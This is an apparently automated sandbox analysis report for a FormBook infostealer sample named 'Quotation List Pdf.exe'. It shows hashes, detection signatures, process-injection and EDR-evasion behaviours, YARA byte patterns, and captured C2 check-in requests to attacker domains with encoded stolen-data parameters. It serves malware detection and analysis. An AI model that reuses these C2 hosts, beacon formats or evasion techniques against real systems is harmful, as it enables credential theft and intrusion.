Windows Analysis Report
Quotation List Pdf.exe

Overview

General Information

Sample name: Quotation List Pdf.exe
Analysis ID: 1465353
MD5: 9cfd62fc26438eeb8a50922265ad0ea7
SHA1: 6bf1e9ab8b0d0c486b85649cf3bc8c1db4b21b01
SHA256: 7eaa347573db3f24316a9ab2d30256db4d35105c7d93f9dbf8d860ec99949280
Tags: exe

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic
Yara detected FormBook
AI detected suspicious sample
Allocates memory in foreign processes
Found direct / indirect Syscall (likely to bypass EDR)
Initial sample is a PE file and has a suspicious name
Injects a PE file into a foreign processes
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Performs DNS queries to domains with low reputation
Queues an APC in another process (thread injection)
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Uses ping.exe to check the status of other devices and networks
Uses regedit.exe to modify the Windows registry
Writes to foreign memory regions
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found evasive API chain (date check)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains sections with non-standard names
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Uncommon Svchost Parent Process
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

  • System is w10x64
  • Quotation List Pdf.exe (PID: 3020 cmdline: "C:\Users\user\Desktop\Quotation List Pdf.exe" MD5: 9CFD62FC26438EEB8A50922265AD0EA7)
    • conhost.exe (PID: 6220 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • svchost.exe (PID: 3688 cmdline: "C:\Windows\System32\svchost.exe" MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
    • regedit.exe (PID: 7008 cmdline: "C:\Windows\regedit.exe" MD5: 999A30979F6195BF562068639FFC4426)
    • vbc.exe (PID: 6852 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe" MD5: 0A7608DB01CAE07792CEA95E792AA866)
      • tiwTBKVufjvhPL.exe (PID: 6260 cmdline: "C:\Program Files (x86)\imKjXZcdkPvaNBmohymPyGBpYqHlJGFXfRwQSYwktKdQathTVR\tiwTBKVufjvhPL.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • PING.EXE (PID: 1160 cmdline: "C:\Windows\SysWOW64\PING.EXE" MD5: B3624DD758CCECF93A1226CEF252CA12)
          • tiwTBKVufjvhPL.exe (PID: 5992 cmdline: "C:\Program Files (x86)\imKjXZcdkPvaNBmohymPyGBpYqHlJGFXfRwQSYwktKdQathTVR\tiwTBKVufjvhPL.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
          • firefox.exe (PID: 4788 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
  • cleanup
No configs have been found
Source | Rule | Description | Author | Strings
00000005.00000002.1557293648.0000000000400000.00000040.00000400.00020000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security
00000005.00000002.1557293648.0000000000400000.00000040.00000400.00020000.00000000.sdmp | Windows_Trojan_Formbook_1112e116 | unknown | unknown
  • 0x2de83:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
  • 0x173e2:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
00000007.00000002.3299718726.0000000003450000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security
00000007.00000002.3299718726.0000000003450000.00000004.00000800.00020000.00000000.sdmp | Windows_Trojan_Formbook_1112e116 | unknown | unknown
  • 0x2ab60:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
  • 0x140bf:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
00000006.00000002.3299760610.00000000043B0000.00000040.00000001.00040000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security
Source | Rule | Description | Author | Strings
5.2.vbc.exe.400000.0.unpack | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security
5.2.vbc.exe.400000.0.unpack | Windows_Trojan_Formbook_1112e116 | unknown | unknown
  • 0x2d083:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
  • 0x165e2:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
5.2.vbc.exe.400000.0.raw.unpack | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security
5.2.vbc.exe.400000.0.raw.unpack | Windows_Trojan_Formbook_1112e116 | unknown | unknown
  • 0x2de83:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
  • 0x173e2:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01

            System Summary

            Source: Process started, Author: Florian Roth (Nextron Systems), Data: Command: "C:\Windows\System32\svchost.exe", CommandLine: "C:\Windows\System32\svchost.exe", CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\Quotation List Pdf.exe", ParentImage: C:\Users\user\Desktop\Quotation List Pdf.exe, ParentProcessId: 3020, ParentProcessName: Quotation List Pdf.exe, ProcessCommandLine: "C:\Windows\System32\svchost.exe", ProcessId: 3688, ProcessName: svchost.exe
            Source: Process started, Author: vburov, Data: Command: "C:\Windows\System32\svchost.exe", CommandLine: "C:\Windows\System32\svchost.exe", CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\Quotation List Pdf.exe", ParentImage: C:\Users\user\Desktop\Quotation List Pdf.exe, ParentProcessId: 3020, ParentProcessName: Quotation List Pdf.exe, ProcessCommandLine: "C:\Windows\System32\svchost.exe", ProcessId: 3688, ProcessName: svchost.exe
            Timestamp: 07/01/24-15:45:01.553785
            SID: 2856318
            Source Port: 49713
            Destination Port: 80
            Protocol: TCP
            Classtype: A Network Trojan was detected

            AV Detection

            Source: Quotation List Pdf.exe, ReversingLabs: Detection: 47%
            Source: Yara match, File source: 5.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara match, File source: 5.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara match, File source: 00000005.00000002.1557293648.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match, File source: 00000007.00000002.3299718726.0000000003450000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match, File source: 00000006.00000002.3299760610.00000000043B0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match, File source: 00000007.00000002.3299617930.0000000003410000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match, File source: 00000005.00000002.1557934690.0000000007A30000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match, File source: 00000007.00000002.3297787952.0000000003080000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match, File source: 00000005.00000002.1557553662.0000000005780000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match, File source: 00000009.00000002.3302954162.0000000005210000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Submited Sample, Integrated Neural Analysis Model: Matched 100.0% probability
            Source: Quotation List Pdf.exe, Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
            Source: Binary string: Unexpected node type! Please add aupport for any new parse tree nodes to the AutoParseTreeVisitor class!VB$AnonymousDelegateVB$StateMachinemscorpe.dllCreateICeeFileGenCreateICeeFileGenDestroyICeeFileGenDestroyICeeFileGen%ld.Myalink.dllCreateALinkCreateALinkComImport_VtblGap As Integer.pdbCLSID_CorSymWriter&%s.sdatavector<T> too longS?~ source: PING.EXE, 00000007.00000002.3302803643.00000000040DC000.00000004.10000000.00040000.00000000.sdmp, PING.EXE, 00000007.00000002.3301719509.0000000003B6E000.00000004.00000020.00020000.00000000.sdmp, tiwTBKVufjvhPL.exe, 00000009.00000000.1624939934.0000000002DDC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000B.00000002.1846037806.0000000022D1C000.00000004.80000000.00040000.00000000.sdmp
            Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: tiwTBKVufjvhPL.exe, 00000006.00000002.3297786595.00000000000FE000.00000002.00000001.01000000.00000004.sdmp, tiwTBKVufjvhPL.exe, 00000009.00000000.1624296324.00000000000FE000.00000002.00000001.01000000.00000004.sdmp
            Source: Binary string: wntdll.pdbUGP source: vbc.exe, 00000005.00000002.1557586144.00000000057E0000.00000040.00001000.00020000.00000000.sdmp, PING.EXE, 00000007.00000002.3300263133.00000000039AE000.00000040.00001000.00020000.00000000.sdmp, PING.EXE, 00000007.00000003.1557633675.00000000034BE000.00000004.00000020.00020000.00000000.sdmp, PING.EXE, 00000007.00000003.1559396373.0000000003668000.00000004.00000020.00020000.00000000.sdmp, PING.EXE, 00000007.00000002.3300263133.0000000003810000.00000040.00001000.00020000.00000000.sdmp
            Source: Binary string: wntdll.pdb source: vbc.exe, vbc.exe, 00000005.00000002.1557586144.00000000057E0000.00000040.00001000.00020000.00000000.sdmp, PING.EXE, PING.EXE, 00000007.00000002.3300263133.00000000039AE000.00000040.00001000.00020000.00000000.sdmp, PING.EXE, 00000007.00000003.1557633675.00000000034BE000.00000004.00000020.00020000.00000000.sdmp, PING.EXE, 00000007.00000003.1559396373.0000000003668000.00000004.00000020.00020000.00000000.sdmp, PING.EXE, 00000007.00000002.3300263133.0000000003810000.00000040.00001000.00020000.00000000.sdmp
            Source: Binary string: ping.pdbGCTL source: vbc.exe, 00000005.00000002.1557401565.00000000052B8000.00000004.00000020.00020000.00000000.sdmp, tiwTBKVufjvhPL.exe, 00000006.00000002.3299029778.0000000000788000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: vbc.pdb source: PING.EXE, 00000007.00000002.3302803643.00000000040DC000.00000004.10000000.00040000.00000000.sdmp, PING.EXE, 00000007.00000002.3301719509.0000000003B6E000.00000004.00000020.00020000.00000000.sdmp, tiwTBKVufjvhPL.exe, 00000009.00000000.1624939934.0000000002DDC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000B.00000002.1846037806.0000000022D1C000.00000004.80000000.00040000.00000000.sdmp
            Source: Binary string: ping.pdb source: vbc.exe, 00000005.00000002.1557401565.00000000052B8000.00000004.00000020.00020000.00000000.sdmp, tiwTBKVufjvhPL.exe, 00000006.00000002.3299029778.0000000000788000.00000004.00000020.00020000.00000000.sdmp
            Source: C:\Windows\SysWOW64\PING.EXE, Code function: 7_2_0309BE10 FindFirstFileW,FindNextFileW,FindClose (7_2_0309BE10)
            Source: C:\Users\user\Desktop\Quotation List Pdf.exe, Code function: 4x nop then push rbx (0_2_00007FF768431C50)
            Source: C:\Users\user\Desktop\Quotation List Pdf.exe, Code function: 4x nop then push rbx (0_2_00007FF7684BDD30)
            Source: C:\Users\user\Desktop\Quotation List Pdf.exe, Code function: 4x nop then sub rsp, 28h (0_2_00007FF7684BDD30)
            Source: C:\Users\user\Desktop\Quotation List Pdf.exe, Code function: 4x nop then push rsi (0_2_00007FF7684BDD30)
            Source: C:\Users\user\Desktop\Quotation List Pdf.exe, Code function: 4x nop then push rdi (0_2_00007FF7684BDD30)
            Source: C:\Users\user\Desktop\Quotation List Pdf.exe, Code function: 4x nop then push rdi (0_2_00007FF7684F3D20)
            Source: C:\Users\user\Desktop\Quotation List Pdf.exe, Code function: 4x nop then push r14 (0_2_00007FF76856D7E0)
            Source: C:\Windows\SysWOW64\PING.EXE, Code function: 4x nop then xor eax, eax (7_2_030896A0)
            Source: C:\Windows\SysWOW64\PING.EXE, Code function: 4x nop then mov ebx, 00000004h (7_2_03660542)

            Networking

            Source: Traffic, Snort IDS: 2856318 ETPRO TROJAN FormBook CnC Checkin (POST) M4 192.168.2.8:49713 -> 3.33.244.179:80
            Source: DNS query: www.ngkwnq.xyz
            Source: DNS query: www.ajjmamlllqqq.xyz
            Source: C:\Program Files (x86)\imKjXZcdkPvaNBmohymPyGBpYqHlJGFXfRwQSYwktKdQathTVR\tiwTBKVufjvhPL.exe, Process created: C:\Windows\SysWOW64\PING.EXE "C:\Windows\SysWOW64\PING.EXE"
            Source: Joe Sandbox View, IP Address: 188.114.97.3
            Source: Joe Sandbox View, IP Address: 76.223.105.230
            Source: unknown, UDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: global trafficHTTP traffic detected: GET /z6sg/?hv=zih0DoxsYMMKz8ZABxgT1WFK2McCJpyMbPq/OME2Y84w2Vm66kFudiKZ8IXY1l1UIMuRoxNGX/afyyUEkrlqrKni6t8ICyCnTx8av+sD3Gyos8WHaN8U0OpOBqhAw2rkZw==&Sbzdb=DvgXWdN HTTP/1.1Accept: */*Accept-Language: en-USHost: www.evoolihubs.shopConnection: closeUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:37.0) Gecko/20100101 Firefox/37.0
            Source: global trafficHTTP traffic detected: GET /4xhu/?hv=kUigRkBAqBt1RQ4PHNukF4xZPToH+1QI6otQDXJCvCY9YbUgfI2Re+iS8c4dlot+geZi3vfTzLYXZH9sWq6jT8j+eYYKaAUwNfi+eLrrbumEku+3ygxonLPUoh3L9hGJlw==&Sbzdb=DvgXWdN HTTP/1.1Accept: */*Accept-Language: en-USHost: www.mycaringfriend.onlineConnection: closeUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:37.0) Gecko/20100101 Firefox/37.0
            Source: global trafficHTTP traffic detected: GET /o2rg/?hv=HosprsjiipEFZkdlXtfyIs2HS8VP0Lx1JctxEV0LpDy1TX4kdcFD2HTZ1ZNwt0d2CmaO7pR5URztAlcHvOxdSj57tnDbyp24LsG2z7IhVzqV3j0gtM8YC4wacEpxZhptTA==&Sbzdb=DvgXWdN HTTP/1.1Accept: */*Accept-Language: en-USHost: www.marttyes.topConnection: closeUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:37.0) Gecko/20100101 Firefox/37.0
            Source: global trafficHTTP traffic detected: GET /v1kj/?hv=doj+6iUDZydJqFVnCXjkp3F4RUW5KXgrYHqPdL8oMaa0q7VqYsyQxdbUVD3Fk32bJgHvLY4KB1BicN6WuEPq/9BNjeLnpFWO+QoiBFVxHjC/ELqB/38Ky5muYdCtwXhrYw==&Sbzdb=DvgXWdN HTTP/1.1Accept: */*Accept-Language: en-USHost: www.sponsoraveteran.infoConnection: closeUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:37.0) Gecko/20100101 Firefox/37.0
            Source: global trafficHTTP traffic detected: GET /e5ni/?hv=5igWVKYME1F2HJuEqzDD4BytRWNfFWn6ld9EO0nuwIC7ejuHGgZWNZHr69K3UvIzgGWBTOng6QRLO5bRM99dWtUQcUECcC3CaxVjbCwQta3fR2FUS95NK5IjfJQajbbRQA==&Sbzdb=DvgXWdN HTTP/1.1Accept: */*Accept-Language: en-USHost: www.yvw66.topConnection: closeUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:37.0) Gecko/20100101 Firefox/37.0
            Source: global trafficHTTP traffic detected: GET /vapn/?hv=zIQCtJPr8f6IEHIEo3TNC67HH9mmSCxic5WS7/A3sw1OteiabhN4nVuyPRk+K2L+MLR9kC9TPTQdF4ehIT0bCTCmTt1bteoRMu1plsZV53w6ucKr+pMiAUHXVfrsn+3QcA==&Sbzdb=DvgXWdN HTTP/1.1Accept: */*Accept-Language: en-USHost: www.fundraiserstuffies.comConnection: closeUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:37.0) Gecko/20100101 Firefox/37.0
            Source: global trafficHTTP traffic detected: GET /8lwi/?hv=VRq/gdJR4rGg5JPfAG5ylFJXonLci7il5oNXQSZCeVYj1ovZxvPBP2fSASRs9V/B8emNhLugTvQrnEJ4A2g8ywXJhi2TGyyLJT3xrxwpBdhnsBD5VEgEmoQil+34l9QVbw==&Sbzdb=DvgXWdN HTTP/1.1Accept: */*Accept-Language: en-USHost: www.aquamotricidad.comConnection: closeUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:37.0) Gecko/20100101 Firefox/37.0
            Source: global trafficHTTP traffic detected: GET /fuua/?hv=3fNRerFIk63V1+IMAu4qlsMdt7YNs0EnlFsxF2g0jvBo5aDcf8mM3XhGrDpzzYUjwL0bjZmkMy0lhAUZIEhvtJpfy2aMBt81fLEje/cDaztKC30TKJAPkx8cZzQFh5/qVA==&Sbzdb=DvgXWdN HTTP/1.1Accept: */*Accept-Language: en-USHost: www.te74y.topConnection: closeUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:37.0) Gecko/20100101 Firefox/37.0
            Source: global trafficHTTP traffic detected: GET /44zl/?hv=cT3mCg7Cmib/+TsqKgcGcLNa3rN7XS3dP4LITboVuuCqI7qZSFFYJV7Jt59+pqQMU8QRjoSmjIZC25OqP8KY8gmteTpLVZlDreUlLLyNnWL1wa1Nczp2K6xKprp1RRbIsA==&Sbzdb=DvgXWdN HTTP/1.1Accept: */*Accept-Language: en-USHost: www.ngkwnq.xyzConnection: closeUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:37.0) Gecko/20100101 Firefox/37.0
            Source: global trafficHTTP traffic detected: GET /jtz4/?hv=r1qQkpPieaVsNUG68+02NppS6IukHQ6wFXr4oQU+uO/CVftnLbVi7u9JfCXfhwamzeJuyCR7X8qwC2gN3XV8echUBAJmUx7G1CfEdwxlKk1EGrOsAByXTICV/hREjOoViQ==&Sbzdb=DvgXWdN HTTP/1.1Accept: */*Accept-Language: en-USHost: www.eoghenluire.comConnection: closeUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:37.0) Gecko/20100101 Firefox/37.0
            Source: global trafficHTTP traffic detected: GET /17ef/?hv=BkwgEDM72plk1SoNdv8pOFX/Y0L1Y0wMy+4dvxwo/Oj/80wh3Wvb7+zqtjdXyImQl2Jnvy48BKhjFvscwh0k3TFr3WzonWtP3CiK72Em1Tp7LQVto/HSEXKZGZ++Ap7pGg==&Sbzdb=DvgXWdN HTTP/1.1Accept: */*Accept-Language: en-USHost: www.poodlemum.comConnection: closeUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:37.0) Gecko/20100101 Firefox/37.0
            Source: global trafficHTTP traffic detected: GET /5lw2/?hv=iESIo6eVsdqcOmRYuFlUcr07YKkPV6iF6CPlu5h9EhLBhYFmo+CVfgok2cyX/3C89hOXIPK4L028RRlOYTTbn0S9j8UWgSdZAw9+mXeQ1LVvSh67jDUK/iIxNMtsobgO7w==&Sbzdb=DvgXWdN HTTP/1.1Accept: */*Accept-Language: en-USHost: www.ajjmamlllqqq.xyzConnection: closeUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:37.0) Gecko/20100101 Firefox/37.0
            Source: global trafficDNS traffic detected: DNS query: www.evoolihubs.shop
            Source: global trafficDNS traffic detected: DNS query: www.mycaringfriend.online
            Source: global trafficDNS traffic detected: DNS query: www.marttyes.top
            Source: global trafficDNS traffic detected: DNS query: www.sponsoraveteran.info
            Source: global trafficDNS traffic detected: DNS query: www.yvw66.top
            Source: global trafficDNS traffic detected: DNS query: www.fundraiserstuffies.com
            Source: global trafficDNS traffic detected: DNS query: www.aquamotricidad.com
            Source: global trafficDNS traffic detected: DNS query: www.te74y.top
            Source: global trafficDNS traffic detected: DNS query: www.ngkwnq.xyz
            Source: global trafficDNS traffic detected: DNS query: www.eoghenluire.com
            Source: global trafficDNS traffic detected: DNS query: www.poodlemum.com
            Source: global trafficDNS traffic detected: DNS query: www.ajjmamlllqqq.xyz
            Source: unknownHTTP traffic detected: POST /4xhu/ HTTP/1.1Accept: */*Accept-Language: en-USAccept-Encoding: gzip, deflate, brHost: www.mycaringfriend.onlineOrigin: http://www.mycaringfriend.onlineContent-Type: application/x-www-form-urlencodedCache-Control: max-age=0Content-Length: 203Connection: closeReferer: http://www.mycaringfriend.online/4xhu/User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:37.0) Gecko/20100101 Firefox/37.0Data Raw: 68 76 3d 70 57 4b 41 53 51 42 48 6b 47 35 58 51 42 45 6e 49 39 75 6a 42 75 56 4e 58 53 6b 63 67 53 6b 62 39 6f 31 4c 4d 68 42 54 79 32 30 6f 55 66 35 31 59 37 65 56 56 66 32 59 34 37 67 7a 74 73 38 48 70 75 45 62 75 2f 66 64 39 39 63 42 53 67 78 37 5a 65 6d 52 5a 4d 66 66 63 4a 77 6b 57 32 51 61 4e 73 61 38 66 71 33 4a 46 35 48 38 78 70 4b 56 78 43 51 58 37 71 6d 44 6b 51 66 71 78 54 50 42 37 30 4d 57 2f 6b 38 73 51 66 63 45 2f 51 5a 74 73 32 61 2f 39 49 31 54 37 6a 79 49 44 37 38 67 6e 76 50 34 34 58 35 64 74 6e 4b 55 57 78 6a 52 77 61 78 43 4b 37 56 35 53 66 73 65 34 5a 79 79 69 4e 64 62 6b 63 45 3d Data Ascii: hv=pWKASQBHkG5XQBEnI9ujBuVNXSkcgSkb9o1LMhBTy20oUf51Y7eVVf2Y47gzts8HpuEbu/fd99cBSgx7ZemRZMffcJwkW2QaNsa8fq3JF5H8xpKVxCQX7qmDkQfqxTPB70MW/k8sQfcE/QZts2a/9I1T7jyID78gnvP44X5dtnKUWxjRwaxCK7V5Sfse4ZyyiNdbkcE=
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 01 Jul 2024 13:45:16 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 01 Jul 2024 13:45:18 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 01 Jul 2024 13:45:21 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this 